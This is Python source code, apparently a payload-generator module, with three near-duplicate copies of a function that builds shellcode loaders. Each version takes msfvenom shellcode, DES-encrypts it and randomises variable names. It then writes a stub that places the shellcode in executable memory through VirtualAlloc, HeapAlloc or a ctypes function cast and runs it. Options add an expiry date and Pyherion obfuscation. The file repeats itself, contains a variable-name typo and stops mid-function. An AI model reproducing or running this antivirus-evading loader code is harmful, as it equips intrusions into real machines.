def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
randctypes = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
randctypes = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += ranctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
randctypes = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as ' + randctypes + '\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.VirtualAlloc(avlol.c_int(0),avlol.c_int(len('+ ShellcodeVariableName +')),avlol.c_int(0x3000),avlol.c_int(0x40))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
if self.required_options["INJECT_METHOD"][0].lower() == "heap":
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
HeapVar = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes as avlol\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
else:
# Get our current date and add number of days to the date
todaysdate = date.today()
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate(self.required_options)
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
RandShellcode = helpers.randomString()
RandReverseShell = helpers.randomString()
RandMemoryShell = helpers.randomString()
RandToday = helpers.randomString()
RandExpire = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv) ) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'from ctypes import *\n'
PayloadCode += 'from datetime import datetime\n'
PayloadCode += 'from datetime import date\n\n'
PayloadCode += RandToday + ' = datetime.now()\n'
PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
PayloadCode += '\t' + RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += '\t' + RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += '\t' + RandShellcode + '()'
if self.required_options["USE_PYHERION"][0].lower() == "y":
PayloadCode = encryption.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
if self.required_options["expire_payload"][0].lower() == "x":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = helpers.randomString()
RandBuf = helpers.randomString()
RandHt = helpers.randomString()
ShellcodeVariableName = helpers.randomString()
RandIV = helpers.randomString()
RandDESKey = helpers.randomString()
RandDESPayload = helpers.randomString()
RandEncShellCodePayload = helpers.randomString()
# encrypt the shellcode and get our randomized key/iv
(EncShellCode, (DESKey, iv)) = encryption.encryptDES(Shellcode)
# Create Payload File
PayloadCode = "from Crypto.Cipher import DES\n"
PayloadCode += "import ctypes as avlol\n"
PayloadCode += RandIV + " = '" + iv + "'\n"
PayloadCode += RandDESKey + " = '" + DESKey + "'\n"
PayloadCode += RandDESPayload + " = DES.new(" + RandDESKey + ", DES.MODE_CFB, " + RandIV + ")\n"
